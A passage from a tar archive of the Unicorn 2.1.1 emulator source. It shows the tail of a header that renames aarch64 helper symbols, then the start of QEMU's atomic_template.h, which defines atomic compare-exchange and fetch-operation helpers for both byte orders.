helper_sve_ldffsds_le_zss helper_sve_ldffsds_le_zss_aarch64 #define helper_sve_ldffsds_le_zd helper_sve_ldffsds_le_zd_aarch64 #define helper_sve_ldffsds_be_zsu helper_sve_ldffsds_be_zsu_aarch64 #define helper_sve_ldffsds_be_zss helper_sve_ldffsds_be_zss_aarch64 #define helper_sve_ldffsds_be_zd helper_sve_ldffsds_be_zd_aarch64 #define helper_sve_ldffdd_le_zsu helper_sve_ldffdd_le_zsu_aarch64 #define helper_sve_ldffdd_le_zss helper_sve_ldffdd_le_zss_aarch64 #define helper_sve_ldffdd_le_zd helper_sve_ldffdd_le_zd_aarch64 #define helper_sve_ldffdd_be_zsu helper_sve_ldffdd_be_zsu_aarch64 #define helper_sve_ldffdd_be_zss helper_sve_ldffdd_be_zss_aarch64 #define helper_sve_ldffdd_be_zd helper_sve_ldffdd_be_zd_aarch64 #define helper_sve_stbs_zsu helper_sve_stbs_zsu_aarch64 #define helper_sve_sths_le_zsu helper_sve_sths_le_zsu_aarch64 #define helper_sve_sths_be_zsu helper_sve_sths_be_zsu_aarch64 #define helper_sve_stss_le_zsu helper_sve_stss_le_zsu_aarch64 #define helper_sve_stss_be_zsu helper_sve_stss_be_zsu_aarch64 #define helper_sve_stbs_zss helper_sve_stbs_zss_aarch64 #define helper_sve_sths_le_zss helper_sve_sths_le_zss_aarch64 #define helper_sve_sths_be_zss helper_sve_sths_be_zss_aarch64 #define helper_sve_stss_le_zss helper_sve_stss_le_zss_aarch64 #define helper_sve_stss_be_zss helper_sve_stss_be_zss_aarch64 #define helper_sve_stbd_zsu helper_sve_stbd_zsu_aarch64 #define helper_sve_sthd_le_zsu helper_sve_sthd_le_zsu_aarch64 #define helper_sve_sthd_be_zsu helper_sve_sthd_be_zsu_aarch64 #define helper_sve_stsd_le_zsu helper_sve_stsd_le_zsu_aarch64 #define helper_sve_stsd_be_zsu helper_sve_stsd_be_zsu_aarch64 #define helper_sve_stdd_le_zsu helper_sve_stdd_le_zsu_aarch64 #define helper_sve_stdd_be_zsu helper_sve_stdd_be_zsu_aarch64 #define helper_sve_stbd_zss helper_sve_stbd_zss_aarch64 #define helper_sve_sthd_le_zss helper_sve_sthd_le_zss_aarch64 #define helper_sve_sthd_be_zss helper_sve_sthd_be_zss_aarch64 #define helper_sve_stsd_le_zss helper_sve_stsd_le_zss_aarch64 #define helper_sve_stsd_be_zss helper_sve_stsd_be_zss_aarch64 #define helper_sve_stdd_le_zss helper_sve_stdd_le_zss_aarch64 #define helper_sve_stdd_be_zss helper_sve_stdd_be_zss_aarch64 #define helper_sve_stbd_zd helper_sve_stbd_zd_aarch64 #define helper_sve_sthd_le_zd helper_sve_sthd_le_zd_aarch64 #define helper_sve_sthd_be_zd helper_sve_sthd_be_zd_aarch64 #define helper_sve_stsd_le_zd helper_sve_stsd_le_zd_aarch64 #define helper_sve_stsd_be_zd helper_sve_stsd_be_zd_aarch64 #define helper_sve_stdd_le_zd helper_sve_stdd_le_zd_aarch64 #define helper_sve_stdd_be_zd helper_sve_stdd_be_zd_aarch64 #define arm_cpu_do_unaligned_access arm_cpu_do_unaligned_access_aarch64 #define arm_cpu_do_transaction_failed arm_cpu_do_transaction_failed_aarch64 #define arm_cpu_tlb_fill arm_cpu_tlb_fill_aarch64 #define a64_translate_init a64_translate_init_aarch64 #define gen_a64_set_pc_im gen_a64_set_pc_im_aarch64 #define unallocated_encoding unallocated_encoding_aarch64 #define new_tmp_a64 new_tmp_a64_aarch64 #define new_tmp_a64_zero new_tmp_a64_zero_aarch64 #define cpu_reg cpu_reg_aarch64 #define cpu_reg_sp cpu_reg_sp_aarch64 #define read_cpu_reg read_cpu_reg_aarch64 #define read_cpu_reg_sp read_cpu_reg_sp_aarch64 #define write_fp_dreg write_fp_dreg_aarch64 #define get_fpstatus_ptr get_fpstatus_ptr_aarch64 #define sve_access_check sve_access_check_aarch64 #define logic_imm_decode_wmask logic_imm_decode_wmask_aarch64 #define arm_translate_init arm_translate_init_aarch64 #define arm_test_cc arm_test_cc_aarch64 #define arm_free_cc arm_free_cc_aarch64 #define arm_jump_cc arm_jump_cc_aarch64 #define arm_gen_test_cc arm_gen_test_cc_aarch64 #define vfp_expand_imm vfp_expand_imm_aarch64 #define gen_cmtst_i64 gen_cmtst_i64_aarch64 #define gen_ushl_i32 gen_ushl_i32_aarch64 #define gen_ushl_i64 gen_ushl_i64_aarch64 #define gen_sshl_i32 gen_sshl_i32_aarch64 #define gen_sshl_i64 gen_sshl_i64_aarch64 #define gen_intermediate_code gen_intermediate_code_aarch64 #define restore_state_to_opc restore_state_to_opc_aarch64 #define disas_sve disas_sve_aarch64 #define helper_neon_qrdmlah_s16 helper_neon_qrdmlah_s16_aarch64 #define helper_gvec_qrdmlah_s16 helper_gvec_qrdmlah_s16_aarch64 #define helper_neon_qrdmlsh_s16 helper_neon_qrdmlsh_s16_aarch64 #define helper_gvec_qrdmlsh_s16 helper_gvec_qrdmlsh_s16_aarch64 #define helper_neon_qrdmlah_s32 helper_neon_qrdmlah_s32_aarch64 #define helper_gvec_qrdmlah_s32 helper_gvec_qrdmlah_s32_aarch64 #define helper_neon_qrdmlsh_s32 helper_neon_qrdmlsh_s32_aarch64 #define helper_gvec_qrdmlsh_s32 helper_gvec_qrdmlsh_s32_aarch64 #define helper_gvec_sdot_b helper_gvec_sdot_b_aarch64 #define helper_gvec_udot_b helper_gvec_udot_b_aarch64 #define helper_gvec_sdot_h helper_gvec_sdot_h_aarch64 #define helper_gvec_udot_h helper_gvec_udot_h_aarch64 #define helper_gvec_sdot_idx_b helper_gvec_sdot_idx_b_aarch64 #define helper_gvec_udot_idx_b helper_gvec_udot_idx_b_aarch64 #define helper_gvec_sdot_idx_h helper_gvec_sdot_idx_h_aarch64 #define helper_gvec_udot_idx_h helper_gvec_udot_idx_h_aarch64 #define helper_gvec_fcaddh helper_gvec_fcaddh_aarch64 #define helper_gvec_fcadds helper_gvec_fcadds_aarch64 #define helper_gvec_fcaddd helper_gvec_fcaddd_aarch64 #define helper_gvec_fcmlah helper_gvec_fcmlah_aarch64 #define helper_gvec_fcmlah_idx helper_gvec_fcmlah_idx_aarch64 #define helper_gvec_fcmlas helper_gvec_fcmlas_aarch64 #define helper_gvec_fcmlas_idx helper_gvec_fcmlas_idx_aarch64 #define helper_gvec_fcmlad helper_gvec_fcmlad_aarch64 #define helper_gvec_frecpe_h helper_gvec_frecpe_h_aarch64 #define helper_gvec_frecpe_s helper_gvec_frecpe_s_aarch64 #define helper_gvec_frecpe_d helper_gvec_frecpe_d_aarch64 #define helper_gvec_frsqrte_h helper_gvec_frsqrte_h_aarch64 #define helper_gvec_frsqrte_s helper_gvec_frsqrte_s_aarch64 #define helper_gvec_frsqrte_d helper_gvec_frsqrte_d_aarch64 #define helper_gvec_fadd_h helper_gvec_fadd_h_aarch64 #define helper_gvec_fadd_s helper_gvec_fadd_s_aarch64 #define helper_gvec_fadd_d helper_gvec_fadd_d_aarch64 #define helper_gvec_fsub_h helper_gvec_fsub_h_aarch64 #define helper_gvec_fsub_s helper_gvec_fsub_s_aarch64 #define helper_gvec_fsub_d helper_gvec_fsub_d_aarch64 #define helper_gvec_fmul_h helper_gvec_fmul_h_aarch64 #define helper_gvec_fmul_s helper_gvec_fmul_s_aarch64 #define helper_gvec_fmul_d helper_gvec_fmul_d_aarch64 #define helper_gvec_ftsmul_h helper_gvec_ftsmul_h_aarch64 #define helper_gvec_ftsmul_s helper_gvec_ftsmul_s_aarch64 #define helper_gvec_ftsmul_d helper_gvec_ftsmul_d_aarch64 #define helper_gvec_recps_h helper_gvec_recps_h_aarch64 #define helper_gvec_recps_s helper_gvec_recps_s_aarch64 #define helper_gvec_recps_d helper_gvec_recps_d_aarch64 #define helper_gvec_rsqrts_h helper_gvec_rsqrts_h_aarch64 #define helper_gvec_rsqrts_s helper_gvec_rsqrts_s_aarch64 #define helper_gvec_rsqrts_d helper_gvec_rsqrts_d_aarch64 #define helper_gvec_fmul_idx_h helper_gvec_fmul_idx_h_aarch64 #define helper_gvec_fmul_idx_s helper_gvec_fmul_idx_s_aarch64 #define helper_gvec_fmul_idx_d helper_gvec_fmul_idx_d_aarch64 #define helper_gvec_fmla_idx_h helper_gvec_fmla_idx_h_aarch64 #define helper_gvec_fmla_idx_s helper_gvec_fmla_idx_s_aarch64 #define helper_gvec_fmla_idx_d helper_gvec_fmla_idx_d_aarch64 #define helper_gvec_uqadd_b helper_gvec_uqadd_b_aarch64 #define helper_gvec_uqadd_h helper_gvec_uqadd_h_aarch64 #define helper_gvec_uqadd_s helper_gvec_uqadd_s_aarch64 #define helper_gvec_sqadd_b helper_gvec_sqadd_b_aarch64 #define helper_gvec_sqadd_h helper_gvec_sqadd_h_aarch64 #define helper_gvec_sqadd_s helper_gvec_sqadd_s_aarch64 #define helper_gvec_uqsub_b helper_gvec_uqsub_b_aarch64 #define helper_gvec_uqsub_h helper_gvec_uqsub_h_aarch64 #define helper_gvec_uqsub_s helper_gvec_uqsub_s_aarch64 #define helper_gvec_sqsub_b helper_gvec_sqsub_b_aarch64 #define helper_gvec_sqsub_h helper_gvec_sqsub_h_aarch64 #define helper_gvec_sqsub_s helper_gvec_sqsub_s_aarch64 #define helper_gvec_uqadd_d helper_gvec_uqadd_d_aarch64 #define helper_gvec_uqsub_d helper_gvec_uqsub_d_aarch64 #define helper_gvec_sqadd_d helper_gvec_sqadd_d_aarch64 #define helper_gvec_sqsub_d helper_gvec_sqsub_d_aarch64 #define helper_gvec_fmlal_a32 helper_gvec_fmlal_a32_aarch64 #define helper_gvec_fmlal_a64 helper_gvec_fmlal_a64_aarch64 #define helper_gvec_fmlal_idx_a32 helper_gvec_fmlal_idx_a32_aarch64 #define helper_gvec_fmlal_idx_a64 helper_gvec_fmlal_idx_a64_aarch64 #define helper_gvec_sshl_b helper_gvec_sshl_b_aarch64 #define helper_gvec_sshl_h helper_gvec_sshl_h_aarch64 #define helper_gvec_ushl_b helper_gvec_ushl_b_aarch64 #define helper_gvec_ushl_h helper_gvec_ushl_h_aarch64 #define helper_gvec_pmul_b helper_gvec_pmul_b_aarch64 #define helper_gvec_pmull_q helper_gvec_pmull_q_aarch64 #define helper_neon_pmull_h helper_neon_pmull_h_aarch64 #define helper_sve2_pmull_h helper_sve2_pmull_h_aarch64 #define helper_vfp_get_fpscr helper_vfp_get_fpscr_aarch64 #define vfp_get_fpscr vfp_get_fpscr_aarch64 #define helper_vfp_set_fpscr helper_vfp_set_fpscr_aarch64 #define vfp_set_fpscr vfp_set_fpscr_aarch64 #define helper_vfp_adds helper_vfp_adds_aarch64 #define helper_vfp_addd helper_vfp_addd_aarch64 #define helper_vfp_subs helper_vfp_subs_aarch64 #define helper_vfp_subd helper_vfp_subd_aarch64 #define helper_vfp_muls helper_vfp_muls_aarch64 #define helper_vfp_muld helper_vfp_muld_aarch64 #define helper_vfp_divs helper_vfp_divs_aarch64 #define helper_vfp_divd helper_vfp_divd_aarch64 #define helper_vfp_mins helper_vfp_mins_aarch64 #define helper_vfp_mind helper_vfp_mind_aarch64 #define helper_vfp_maxs helper_vfp_maxs_aarch64 #define helper_vfp_maxd helper_vfp_maxd_aarch64 #define helper_vfp_minnums helper_vfp_minnums_aarch64 #define helper_vfp_minnumd helper_vfp_minnumd_aarch64 #define helper_vfp_maxnums helper_vfp_maxnums_aarch64 #define helper_vfp_maxnumd helper_vfp_maxnumd_aarch64 #define helper_vfp_negs helper_vfp_negs_aarch64 #define helper_vfp_negd helper_vfp_negd_aarch64 #define helper_vfp_abss helper_vfp_abss_aarch64 #define helper_vfp_absd helper_vfp_absd_aarch64 #define helper_vfp_sqrts helper_vfp_sqrts_aarch64 #define helper_vfp_sqrtd helper_vfp_sqrtd_aarch64 #define helper_vfp_cmps helper_vfp_cmps_aarch64 #define helper_vfp_cmpes helper_vfp_cmpes_aarch64 #define helper_vfp_cmpd helper_vfp_cmpd_aarch64 #define helper_vfp_cmped helper_vfp_cmped_aarch64 #define helper_vfp_sitoh helper_vfp_sitoh_aarch64 #define helper_vfp_tosih helper_vfp_tosih_aarch64 #define helper_vfp_tosizh helper_vfp_tosizh_aarch64 #define helper_vfp_sitos helper_vfp_sitos_aarch64 #define helper_vfp_tosis helper_vfp_tosis_aarch64 #define helper_vfp_tosizs helper_vfp_tosizs_aarch64 #define helper_vfp_sitod helper_vfp_sitod_aarch64 #define helper_vfp_tosid helper_vfp_tosid_aarch64 #define helper_vfp_tosizd helper_vfp_tosizd_aarch64 #define helper_vfp_uitoh helper_vfp_uitoh_aarch64 #define helper_vfp_touih helper_vfp_touih_aarch64 #define helper_vfp_touizh helper_vfp_touizh_aarch64 #define helper_vfp_uitos helper_vfp_uitos_aarch64 #define helper_vfp_touis helper_vfp_touis_aarch64 #define helper_vfp_touizs helper_vfp_touizs_aarch64 #define helper_vfp_uitod helper_vfp_uitod_aarch64 #define helper_vfp_touid helper_vfp_touid_aarch64 #define helper_vfp_touizd helper_vfp_touizd_aarch64 #define helper_vfp_fcvtds helper_vfp_fcvtds_aarch64 #define helper_vfp_fcvtsd helper_vfp_fcvtsd_aarch64 #define helper_vfp_shtod helper_vfp_shtod_aarch64 #define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_aarch64 #define helper_vfp_toshd helper_vfp_toshd_aarch64 #define helper_vfp_sltod helper_vfp_sltod_aarch64 #define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_aarch64 #define helper_vfp_tosld helper_vfp_tosld_aarch64 #define helper_vfp_sqtod helper_vfp_sqtod_aarch64 #define helper_vfp_tosqd helper_vfp_tosqd_aarch64 #define helper_vfp_uhtod helper_vfp_uhtod_aarch64 #define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_aarch64 #define helper_vfp_touhd helper_vfp_touhd_aarch64 #define helper_vfp_ultod helper_vfp_ultod_aarch64 #define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_aarch64 #define helper_vfp_tould helper_vfp_tould_aarch64 #define helper_vfp_uqtod helper_vfp_uqtod_aarch64 #define helper_vfp_touqd helper_vfp_touqd_aarch64 #define helper_vfp_shtos helper_vfp_shtos_aarch64 #define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_aarch64 #define helper_vfp_toshs helper_vfp_toshs_aarch64 #define helper_vfp_sltos helper_vfp_sltos_aarch64 #define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_aarch64 #define helper_vfp_tosls helper_vfp_tosls_aarch64 #define helper_vfp_sqtos helper_vfp_sqtos_aarch64 #define helper_vfp_tosqs helper_vfp_tosqs_aarch64 #define helper_vfp_uhtos helper_vfp_uhtos_aarch64 #define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_aarch64 #define helper_vfp_touhs helper_vfp_touhs_aarch64 #define helper_vfp_ultos helper_vfp_ultos_aarch64 #define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_aarch64 #define helper_vfp_touls helper_vfp_touls_aarch64 #define helper_vfp_uqtos helper_vfp_uqtos_aarch64 #define helper_vfp_touqs helper_vfp_touqs_aarch64 #define helper_vfp_sltoh helper_vfp_sltoh_aarch64 #define helper_vfp_ultoh helper_vfp_ultoh_aarch64 #define helper_vfp_sqtoh helper_vfp_sqtoh_aarch64 #define helper_vfp_uqtoh helper_vfp_uqtoh_aarch64 #define helper_vfp_toshh helper_vfp_toshh_aarch64 #define helper_vfp_touhh helper_vfp_touhh_aarch64 #define helper_vfp_toslh helper_vfp_toslh_aarch64 #define helper_vfp_toulh helper_vfp_toulh_aarch64 #define helper_vfp_tosqh helper_vfp_tosqh_aarch64 #define helper_vfp_touqh helper_vfp_touqh_aarch64 #define helper_set_rmode helper_set_rmode_aarch64 #define helper_set_neon_rmode helper_set_neon_rmode_aarch64 #define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_aarch64 #define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_aarch64 #define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_aarch64 #define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_aarch64 #define helper_recps_f32 helper_recps_f32_aarch64 #define helper_rsqrts_f32 helper_rsqrts_f32_aarch64 #define helper_recpe_f16 helper_recpe_f16_aarch64 #define helper_recpe_f32 helper_recpe_f32_aarch64 #define helper_recpe_f64 helper_recpe_f64_aarch64 #define helper_rsqrte_f16 helper_rsqrte_f16_aarch64 #define helper_rsqrte_f32 helper_rsqrte_f32_aarch64 #define helper_rsqrte_f64 helper_rsqrte_f64_aarch64 #define helper_recpe_u32 helper_recpe_u32_aarch64 #define helper_rsqrte_u32 helper_rsqrte_u32_aarch64 #define helper_vfp_muladds helper_vfp_muladds_aarch64 #define helper_vfp_muladdd helper_vfp_muladdd_aarch64 #define helper_rints_exact helper_rints_exact_aarch64 #define helper_rintd_exact helper_rintd_exact_aarch64 #define helper_rints helper_rints_aarch64 #define helper_rintd helper_rintd_aarch64 #define arm_rmode_to_sf arm_rmode_to_sf_aarch64 #define helper_fjcvtzs helper_fjcvtzs_aarch64 #define helper_vjcvt helper_vjcvt_aarch64 #define helper_frint32_s helper_frint32_s_aarch64 #define helper_frint64_s helper_frint64_s_aarch64 #define helper_frint32_d helper_frint32_d_aarch64 #define helper_frint64_d helper_frint64_d_aarch64 #define helper_check_hcr_el2_trap helper_check_hcr_el2_trap_aarch64 #define mla_op mla_op_aarch64 #define mls_op mls_op_aarch64 #define sshl_op sshl_op_aarch64 #define ushl_op ushl_op_aarch64 #define uqsub_op uqsub_op_aarch64 #define sqsub_op sqsub_op_aarch64 #define uqadd_op uqadd_op_aarch64 #define sqadd_op sqadd_op_aarch64 #define sli_op sli_op_aarch64 #define cmtst_op cmtst_op_aarch64 #define sri_op sri_op_aarch64 #define usra_op usra_op_aarch64 #define ssra_op ssra_op_aarch64 #define aarch64_translator_ops aarch64_translator_ops_aarch64 #define pred_esz_masks pred_esz_masks_aarch64 #define helper_uc_hooksys64 helper_uc_hooksys64_aarch64 #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/accel/���������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015222�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/accel/tcg/�����������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015777�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/accel/tcg/atomic_template.h������������������������������������������������������0000664�0000000�0000000�00000030067�14675241067�0021325�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Atomic helper templates * Included from tcg-runtime.c and cputlb.c. * * Copyright (c) 2016 Red Hat, Inc * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #if DATA_SIZE == 16 # define SUFFIX o # define DATA_TYPE Int128 # define BSWAP bswap128 # define SHIFT 4 #elif DATA_SIZE == 8 # define SUFFIX q # define DATA_TYPE uint64_t # define SDATA_TYPE int64_t # define BSWAP bswap64 # define SHIFT 3 #elif DATA_SIZE == 4 # define SUFFIX l # define DATA_TYPE uint32_t # define SDATA_TYPE int32_t # define BSWAP bswap32 # define SHIFT 2 #elif DATA_SIZE == 2 # define SUFFIX w # define DATA_TYPE uint16_t # define SDATA_TYPE int16_t # define BSWAP bswap16 # define SHIFT 1 #elif DATA_SIZE == 1 # define SUFFIX b # define DATA_TYPE uint8_t # define SDATA_TYPE int8_t # define BSWAP # define SHIFT 0 #else # error unsupported data size #endif #if DATA_SIZE >= 4 # define ABI_TYPE DATA_TYPE #else # define ABI_TYPE uint32_t #endif /* Define host-endian atomic operations. Note that END is used within the ATOMIC_NAME macro, and redefined below. */ #if DATA_SIZE == 1 # define END #elif defined(HOST_WORDS_BIGENDIAN) # define END _be #else # define END _le #endif ABI_TYPE ATOMIC_NAME(cmpxchg)(CPUArchState *env, target_ulong addr, ABI_TYPE cmpv, ABI_TYPE newv EXTRA_ARGS) { ATOMIC_MMU_DECLS; DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; DATA_TYPE ret; #if DATA_SIZE == 16 ret = atomic16_cmpxchg(haddr, cmpv, newv); #else #ifdef _MSC_VER ret = atomic_cmpxchg__nocheck((long *)haddr, cmpv, newv); #else ret = atomic_cmpxchg__nocheck(haddr, cmpv, newv); #endif #endif ATOMIC_MMU_CLEANUP; return ret; } #if DATA_SIZE >= 16 #if HAVE_ATOMIC128 ABI_TYPE ATOMIC_NAME(ld)(CPUArchState *env, target_ulong addr EXTRA_ARGS) { ATOMIC_MMU_DECLS; DATA_TYPE val, *haddr = ATOMIC_MMU_LOOKUP; val = atomic16_read(haddr); ATOMIC_MMU_CLEANUP; return val; } void ATOMIC_NAME(st)(CPUArchState *env, target_ulong addr, ABI_TYPE val EXTRA_ARGS) { ATOMIC_MMU_DECLS; DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; atomic16_set(haddr, val); ATOMIC_MMU_CLEANUP; } #endif #else ABI_TYPE ATOMIC_NAME(xchg)(CPUArchState *env, target_ulong addr, ABI_TYPE val EXTRA_ARGS) { ATOMIC_MMU_DECLS; DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; DATA_TYPE ret; ret = *haddr; *haddr = val; ATOMIC_MMU_CLEANUP; return ret; } #ifdef _MSC_VER #define GEN_ATOMIC_HELPER(X) \ ABI_TYPE ATOMIC_NAME(X)(CPUArchState *env, target_ulong addr, \ ABI_TYPE val EXTRA_ARGS) \ { \ ATOMIC_MMU_DECLS; \ DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; \ DATA_TYPE ret; \ ret = atomic_##X((long *)haddr, val); \ ATOMIC_MMU_CLEANUP; \ return ret; \ } #else #define GEN_ATOMIC_HELPER(X) \ ABI_TYPE ATOMIC_NAME(X)(CPUArchState *env, target_ulong addr, \ ABI_TYPE val EXTRA_ARGS) \ { \ ATOMIC_MMU_DECLS; \ DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; \ DATA_TYPE ret; \ ret = atomic_##X(haddr, val); \ ATOMIC_MMU_CLEANUP; \ return ret; \ } #endif GEN_ATOMIC_HELPER(fetch_add) GEN_ATOMIC_HELPER(fetch_and) GEN_ATOMIC_HELPER(fetch_or) GEN_ATOMIC_HELPER(fetch_xor) GEN_ATOMIC_HELPER(add_fetch) GEN_ATOMIC_HELPER(and_fetch) GEN_ATOMIC_HELPER(or_fetch) GEN_ATOMIC_HELPER(xor_fetch) #undef GEN_ATOMIC_HELPER /* These helpers are, as a whole, full barriers. Within the helper, * the leading barrier is explicit and the trailing barrier is within * cmpxchg primitive. * * Trace this load + RMW loop as a single RMW op. This way, regardless * of CF_PARALLEL's value, we'll trace just a read and a write. */ #define GEN_ATOMIC_HELPER_FN(X, FN, XDATA_TYPE, RET) \ ABI_TYPE ATOMIC_NAME(X)(CPUArchState *env, target_ulong addr, \ ABI_TYPE xval EXTRA_ARGS) \ { \ ATOMIC_MMU_DECLS; \ XDATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; \ XDATA_TYPE cmp, old, new, val = xval; \ cmp = *haddr; \ do { \ old = cmp; new = FN(old, val); \ cmp = *haddr; \ if (cmp == old) \ *haddr = new; \ } while (cmp != old); \ ATOMIC_MMU_CLEANUP; \ return RET; \ } GEN_ATOMIC_HELPER_FN(fetch_smin, MIN, SDATA_TYPE, old) GEN_ATOMIC_HELPER_FN(fetch_umin, MIN, DATA_TYPE, old) GEN_ATOMIC_HELPER_FN(fetch_smax, MAX, SDATA_TYPE, old) GEN_ATOMIC_HELPER_FN(fetch_umax, MAX, DATA_TYPE, old) GEN_ATOMIC_HELPER_FN(smin_fetch, MIN, SDATA_TYPE, new) GEN_ATOMIC_HELPER_FN(umin_fetch, MIN, DATA_TYPE, new) GEN_ATOMIC_HELPER_FN(smax_fetch, MAX, SDATA_TYPE, new) GEN_ATOMIC_HELPER_FN(umax_fetch, MAX, DATA_TYPE, new) #undef GEN_ATOMIC_HELPER_FN #endif /* DATA SIZE >= 16 */ #undef END #if DATA_SIZE > 1 /* Define reverse-host-endian atomic operations. Note that END is used within the ATOMIC_NAME macro. */ #ifdef HOST_WORDS_BIGENDIAN # define END _le #else # define END _be #endif ABI_TYPE ATOMIC_NAME(cmpxchg)(CPUArchState *env, target_ulong addr, ABI_TYPE cmpv, ABI_TYPE newv EXTRA_ARGS) { ATOMIC_MMU_DECLS; DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; DATA_TYPE ret; #if DATA_SIZE == 16 ret = atomic16_cmpxchg(haddr, BSWAP(cmpv), BSWAP(newv)); #else #ifdef _MSC_VER ret = atomic_cmpxchg__nocheck((long *)haddr, BSWAP(cmpv), BSWAP(newv)); #else ret = atomic_cmpxchg__nocheck(haddr, BSWAP(cmpv), BSWAP(newv)); #endif #endif ATOMIC_MMU_CLEANUP; return BSWAP(ret); } #if DATA_SIZE >= 16 #if HAVE_ATOMIC128 ABI_TYPE ATOMIC_NAME(ld)(CPUArchState *env, target_ulong addr EXTRA_ARGS) { ATOMIC_MMU_DECLS; DATA_TYPE val, *haddr = ATOMIC_MMU_LOOKUP; val = atomic16_read(haddr); ATOMIC_MMU_CLEANUP; return BSWAP(val); } void ATOMIC_NAME(st)(CPUArchState *env, target_ulong addr, ABI_TYPE val EXTRA_ARGS) { ATOMIC_MMU_DECLS; DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; val = BSWAP(val); val = BSWAP(val); atomic16_set(haddr, val); ATOMIC_MMU_CLEANUP; } #endif #else ABI_TYPE ATOMIC_NAME(xchg)(CPUArchState *env, target_ulong addr, ABI_TYPE val EXTRA_ARGS) { ATOMIC_MMU_DECLS; DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; ABI_TYPE ret; ret = *haddr; *haddr = BSWAP(val); ATOMIC_MMU_CLEANUP; return BSWAP(ret); } #ifdef _MSC_VER #define GEN_ATOMIC_HELPER(X) \ ABI_TYPE ATOMIC_NAME(X)(CPUArchState *env, target_ulong addr, \ ABI_TYPE val EXTRA_ARGS) \ { \ ATOMIC_MMU_DECLS; \ DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; \ DATA_TYPE ret; \ ret = atomic_##X((long *)haddr, BSWAP(val)); \ ATOMIC_MMU_CLEANUP; \ return BSWAP(ret); \ } #else #define GEN_ATOMIC_HELPER(X) \ ABI_TYPE ATOMIC_NAME(X)(CPUArchState *env, target_ulong addr, \ ABI_TYPE val EXTRA_ARGS) \ { \ ATOMIC_MMU_DECLS; \ DATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; \ DATA_TYPE ret; \ ret = atomic_##X(haddr, BSWAP(val)); \ ATOMIC_MMU_CLEANUP; \ return BSWAP(ret); \ } #endif GEN_ATOMIC_HELPER(fetch_and) GEN_ATOMIC_HELPER(fetch_or) GEN_ATOMIC_HELPER(fetch_xor) GEN_ATOMIC_HELPER(and_fetch) GEN_ATOMIC_HELPER(or_fetch) GEN_ATOMIC_HELPER(xor_fetch) #undef GEN_ATOMIC_HELPER /* These helpers are, as a whole, full barriers. Within the helper, * the leading barrier is explicit and the trailing barrier is within * cmpxchg primitive. * * Trace this load + RMW loop as a single RMW op. This way, regardless * of CF_PARALLEL's value, we'll trace just a read and a write. */ #define GEN_ATOMIC_HELPER_FN(X, FN, XDATA_TYPE, RET) \ ABI_TYPE ATOMIC_NAME(X)(CPUArchState *env, target_ulong addr, \ ABI_TYPE xval EXTRA_ARGS) \ { \ ATOMIC_MMU_DECLS; \ XDATA_TYPE *haddr = ATOMIC_MMU_LOOKUP; \ XDATA_TYPE ldo, ldn, old, new, val = xval; \ ldn = *haddr; \ do { \ ldo = ldn; old = BSWAP(ldo); new = FN(old, val); \ ldn = *haddr; \ if (ldn == ldo) \ *haddr = BSWAP(new); \ } while (ldo != ldn); \ ATOMIC_MMU_CLEANUP; \ return RET; \ } GEN_ATOMIC_HELPER_FN(fetch_smin, MIN, SDATA_TYPE, old) GEN_ATOMIC_HELPER_FN(fetch_umin, MIN, DATA_TYPE, old) GEN_ATOMIC_HELPER_FN(fetch_smax, MAX, SDATA_TYPE, old) GEN_ATOMIC_HELPER_FN(fetch_umax, MAX, DATA_TYPE, old) GEN_ATOMIC_HELPER_FN(smin_fetch, MIN, SDATA_TYPE, new) GEN_ATOMIC_HELPER_FN(umin_fetch, MIN, DATA_TYPE, new) GEN_ATOMIC_HELPER_FN(smax_fetch, MAX, SDATA_TYPE, new) GEN_ATOMIC_HELPER_FN(umax_fetch, MAX, DATA_TYPE, new) /* Note that for addition, we need to use a separate cmpxchg loop instead of bswaps for the reverse-host-endian helpers. */ #define ADD(X, Y) (X + Y) GEN_ATOMIC_HELPER_FN(fetch_add, ADD, DATA_TYPE, old) GEN_ATOMIC_HELPER_FN(add_fetch, ADD, DATA_TYPE, new) #undef ADD #undef GEN_ATOMIC_HELPER_FN #endif /* DATA_SIZE >= 16 */ #undef END #endif /* 